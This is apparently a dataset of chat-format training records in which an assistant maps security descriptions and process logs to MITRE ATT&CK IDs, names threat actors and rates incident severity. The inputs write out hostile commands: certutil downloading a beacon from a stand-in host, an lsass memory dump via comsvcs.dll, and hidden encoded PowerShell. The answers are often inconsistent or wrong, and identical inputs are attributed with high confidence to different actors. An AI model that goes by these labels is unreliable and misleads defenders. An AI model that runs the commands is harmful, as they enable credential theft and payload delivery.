messages
listlengths
2
2
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-BZZI6BKWRT)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Initial Access", "role": "user" }, { "content":...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Industroyer has used a Trojanized version of the Windows Notepad application for an additional backdoor persistence mechanism.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\":...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: POSHSPY encrypts C2 traffic with AES and RSA.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-A3KJZP92WZ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Privilege Escalation", "role": "user" }, { "con...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1563.002...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2276 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.156.200.61", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0008\"], \"techniques\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-D5VMWNHAEQ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access, Defense Evasion", "role": "user" }, { "content":...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BISCUIT has a command to download a file from the C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hig...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-5N0UGJ6ULG)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"sever...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.138.108.171", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0005\"], \"tech...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.10.25.139", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0001\"], \"techniques\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-3UCN991U9A)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Exfiltration", "role": "user" }, { "content": "{\"se...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.190.183.100", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0040\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 697 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: TYPEFRAME has used ports 443, 8080, and 8443 with a FakeTLS method.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1571\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"conf...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: QakBot has the ability to download additional components and malware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-TDT5C4RVL2)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-FK3R4J6IUG)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"High...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2947 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.98.103.247", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0010\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-37F59474ET)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection, Lateral Movement, Reconnaissance", "role": "user" }, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-68H5AVRNV9)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Execution, Credential Access", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-HCNYC1TC1T)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Zebrocy collects the OS version, computer name and serial number for the storage volume C:.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.61.123.169", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techni...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.105.1.182", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"te...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Accounts may be created on the local system or within a domain or cloud tenant.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1136\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor application logs for suspicious events including repeated MFA failures that may indicate user's primary credentials have been compromised.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-4UOO9IQAHP)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"E...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.179.32.31", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0001\", \"TA0009\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered S...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1568\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-I3Z6WKK6U2)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration, Execution, Reconnaissance", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"c...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.163.172.71", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0043\"], \"techniques\": [\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Pysa has deleted batch files after execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006\"], \"techniqu...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3566 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.179.76.146", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1071.0...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.148.121.122", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Operation Wocao has accessed and collected credentials from password managers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.005\", \"T1555\"]}", "role": "assi...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.46.23.125", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"tec...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: -list /Groups on macOS, and groups on Linux can list local groups.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069.001\", \"T1069\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: WellMess can execute PowerShell scripts received from C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.001\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: SombRAT can execute getinfo to discover the current time on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1124\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.31.18.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-6FIC3PJXM5)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Impact, Command and Control", "role": "user" }, { "content": "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-QD6A56IBBI)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Discovery, Command and Control", "role": "user" }, ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.147.45.109", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: These credentials include both x509 keys and passwords.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098.001\", \"T1098\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"co...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.156.36.39", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0006\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Naikon uses commands such as netsh interface show to discover network interface settings.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistan...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-U4CGO4PD4F)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Impact, Initial Access", "role": "user" }, { ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.7.53.105", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0001\"], \"techniques...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.6.80.198", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0043\"], \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3387 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.69.51.247", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-NTJHP96ZGS)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-7A2PW1OTTE)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Discovery, Collection", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 843 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.176.225.123", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0001\", \"TA0010\"]...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: overwrite or delete MBR in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.115.60.191", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0002\", \"TA0040\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3484 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.39.136.42", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\":...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 997 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.27.90.20", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniq...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3432 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3822 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Cuba has executed hidden PowerShell windows.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564.003\", \"T1564\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-X9OM0FXIPH)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Initial Access, Persistence", "role": "user" }, {...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-0T42AH5C5I)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Initial Access, Reconnaissance", "role": "user" }, { "c...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ryuk has used cmd.exe to create a Registry entry to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistan...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 812 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.160.69.2", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniq...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly executed processes that may attempt to get a listing of open application windows.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1010\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely.", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1914 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-BYYIX1M2VY)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Command and Control, Persistence", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Pan...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.63.135.32", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FALLCHILL can modify file or directory timestamps.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.006\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3101 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Dragonfly has used SMB for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 777 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.48.44.104", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0010\", \"TA0008\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-KVL3YA0JZ8)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Exfiltration", "role": "user" }, { "content"...